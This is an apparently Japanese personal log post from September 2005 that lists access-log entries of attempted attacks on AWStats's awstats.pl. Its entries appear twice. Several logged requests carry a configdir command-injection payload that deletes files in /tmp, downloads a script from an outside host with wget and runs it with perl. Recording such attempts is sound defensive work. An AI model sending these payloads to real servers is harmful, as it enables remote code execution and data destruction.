awstats関連の不正アクセス(9月)
2005年9月15日
awstatsがらみの不正アクセスをまとめてみた。
82.90.174.226 [ripe.net] [arin.net] [lacnic.net]
host226-174.pool8290.interbusiness.it
- - [05/Sep/2005:00:53:14 +0200]
"GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.41.4.4 [ripe.net] [arin.net] [lacnic.net]
c414-4.impsat.com.co
- - [07/Sep/2005:12:05:42 +0200]
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.141.32.77 [ripe.net] [arin.net] [lacnic.net]
opit.unwe.acad.bg
- - [18/Sep/2005:03:50:27 +0200]
"GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
62.149.230.53 [ripe.net] [arin.net] [lacnic.net]
host53-230-149-62.serverdedicati.aruba.it
- - [21/Sep/2005:21:08:21 +0200]
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
82.90.174.226 [ripe.net] [arin.net] [lacnic.net]
host226-174.pool8290.interbusiness.it
- - [05/Sep/2005:00:53:14 +0200]
"GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.41.4.4 [ripe.net] [arin.net] [lacnic.net]
c414-4.impsat.com.co
- - [07/Sep/2005:12:05:42 +0200]
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.141.32.77 [ripe.net] [arin.net] [lacnic.net]
opit.unwe.acad.bg
- - [18/Sep/2005:03:50:27 +0200]
"GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
62.149.230.53 [ripe.net] [arin.net] [lacnic.net]
host53-230-149-62.serverdedicati.aruba.it
- - [21/Sep/2005:21:08:21 +0200]
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"